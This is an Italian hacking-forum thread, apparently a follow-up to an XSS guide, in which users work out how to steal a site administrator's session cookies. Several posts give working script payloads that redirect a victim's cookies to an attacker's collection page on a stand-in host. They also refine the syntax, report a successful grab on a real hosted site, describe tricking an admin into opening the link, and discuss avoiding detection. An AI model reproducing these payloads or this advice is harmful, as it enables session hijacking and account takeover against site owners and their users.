Guida XSS

[akroma8]

ecco ora ho capito, ma mi dovete togliere l'ultimo dubbio...quel codice lì che prende i cookie e me li invia via email...di chi sono?? se io volessi fare una prova a prendere i miei stessi cookie come faccio?basta che vado nell'indirizzo "evil" diciamo?? se io volessi prendere i cookie di una persona in particolare, dovrei fargli aprire quell'ìndirizzo?? Grazie a tutti per gli aiuti che mi state dando...

 

[sCiEnZiAtOpAzZo]

Ti ho già detto che dipende dalla deficienza dell'admin. Se tu gli fai inserire quel comando all'admin arriveranno i suoi cookie a te e a quel punto basta sostituirli con i tuoi e potrai loggarti cm admin. Almeno credo sia così...

 

[akroma8]

ah...ho capito, ma devo fare in modo che l'admin cliccki quell'url con il codice...ma così allora nn è una tecnica attuabile solo in remoto, in questo caso ci vuole un po di social...

 

[sCiEnZiAtOpAzZo]

A tutto ci vuole un po' di social!!! Cmq ti ho già detto che nn ne sn sicuro al 100%

 

[x0kster]

L'hacking è una scienza, e va studiata.

Non tutte le XSS sono sfruttabbili. Hai presente la pagina ruba_cookie.php? tramite quella ti invii i cookie di quel sito internet, e nei cookie sono contenute le pass craccate in md5 o SHA-1 dipende.

Rubando i cookie quindi ottieni dei dati, come ottenerli?

Basta inserire nel textbox o nel collegamento che usa il metodo get

"><script>location.href="http://evil.it/ruba_cookie.php"+document.cookie;</script>
o
"><script>location.href="http://evil.it/ruba_cookie.php",document.cookie;</script>

e te li invia alla tua e-mail.

Ci siamo?

L'hacking è scienza ricorda... non è distruzione

Lord hai fatto un paio di errori..non per essere pignolo ma si dice criptate in md5 non craccate xD

vabbè poi

"><script>location.href="http://evil.it/ruba_cookie.php"+document.cookie;</script>
o
"><script>location.href="http://evil.it/ruba_cookie.php",document.cookie;</script>

ti sei diemnticato di mettere il ? seguito dalla variabile dell' $_GET del rubacookies...

 

[hack4ever]

Complimenti a Murder per la guida, come sempre molto chiara!

Argomento mooolto interessante!

 

[Sireal]

Nono hai ragione, era sera.

Me lo dico da solo sono troppo confusionario mo lo edito

 

[x0kster]

L'hacking è una scienza, e va studiata.

Non tutte le XSS sono sfruttabbili. Hai presente la pagina ruba_cookie.php? tramite quella ti invii i cookie di quel sito internet, e nei cookie sono contenute le pass criptate in md5 o SHA-1 dipende.

Rubando i cookie quindi ottieni dei dati, come ottenerli?

Basta inserire nel textbox o nel collegamento che usa il metodo get

"><script>location.href="http://evil.it/ruba_cookie.php?"+document.cookie;</script>
o
"><script>location.href="http://evil.it/ruba_cookie.php?",document.cookie;</script>

e te li invia alla tua e-mail.

Ci siamo?

L'hacking è scienza ricorda... non è distruzione

hihih Lord ti sei sbagliato di nuovo deve essere ?var= + document.cookie...
devi dichiarare la variabile che immagazzina l'$_GET

 

[Sireal]

Oh mio dio!

Hai ragione, eppure me lo avevi detto anche prima

 

[sCiEnZiAtOpAzZo]

Scrivilo tu allora no?

 

[Sireal]

ahahha,

E' giusto avere critiche, perchè solo con quelle si cresce

 

[sCiEnZiAtOpAzZo]

E' ovvio! Mena me, hai corretto sto pazzo di script o ti devo far diventare + colorito di un arcobaleno?

 

[Sireal]

corretto corretto non ti agitare

 

[sCiEnZiAtOpAzZo]

Tranq scherzavo

 

[Sireal]

anche io

 

[sCiEnZiAtOpAzZo]

Ah se fossi meno distratto ti darei un bel +1
Te lo meriteresti

 

[TheDuke]

scusate la mia ignoranza in materia ma in che modo si trova una xss in un sito?

 

[Devil_Nemesis]

analizzandolo ...

 

[TheDuke]

si ma in che modo?

 

[Bl4cK M4g1c]

Puoi trovare XSS in diversi modi. Ad esempio, ci sono milioni di siti che presentano motori di ricerca interni. Inserendo nel motore di ricerca uno script del tipo:

<script>alert("XSS")</script>

Se lo script viene eseguito, allora vuol dire che quel sito è vulnerabile. In caso contrario ovviamente no. E se il sito non presenta motori di ricerca? Puoi trovare XSS in tutti i campi modificabili, oppure sfruttando variabili buggate. Ma questi sono solo alcuni esempi: se cerchi una XSS ci vuole sempre un pò di immaginazione e innanzitutto bisogna esaminare bene il sorgente della pagina in questione.

 

[TheDuke]

risulta qualcosa all'amministratore del sito?

 

[Liquid_Thunder]

Uhm, ho un piccolo problemino. Ho trovato una XSS grabbante su un sito..ma c'è un piccolo problema: inserisco nella variabile buggata questo:

<script>location.href="http://sito.it/mail.php?c="+document.cookie;</script>

Tutto perfetto, premo Invio, mi riderecta..MA!!

La pagina http://sezioneffe.altervista.org/mail.php?c=*i cookie scritti in chiaro* non è presente, questo può dipendere dal fatto che:

  # La pagina non esiste più.
  # Il link che hai seguito non è valido.
  # La pagina è stata spostata.

Che faccio? Demolisco Altervista o è un problema solo mio?

*EDIT*

Risolto, è bastato mettere a posto di document.cookie, escape(document.cookie), e funzia tutto perfettamente Integratelo nella guida se volete.

 

[TheDuke]

ma nn ho ancora capito se all'amministratore risulta una ricerca sulla possibile presenza di una XSS nel suo sito

 

[DoctorGhost]

All'amministratore del sito non risulta nulla sempre se non effettua un controllo su tette le variabili del sito e salvandole in un file ( da paranoia totale )

Però risultano nei log di apache o iss, ma non si è mai finiti in galera per una xss te li puoi mettere a cercare anche senza proxi

Però se poi con quella xss ci fai danni allora conoscerai i fantomatici GDF

 

[murdercode_imported]

alla gdf non gliene fotte la ciolla , è la polizia postale che ti bussa alle 5 e mezzo della mattina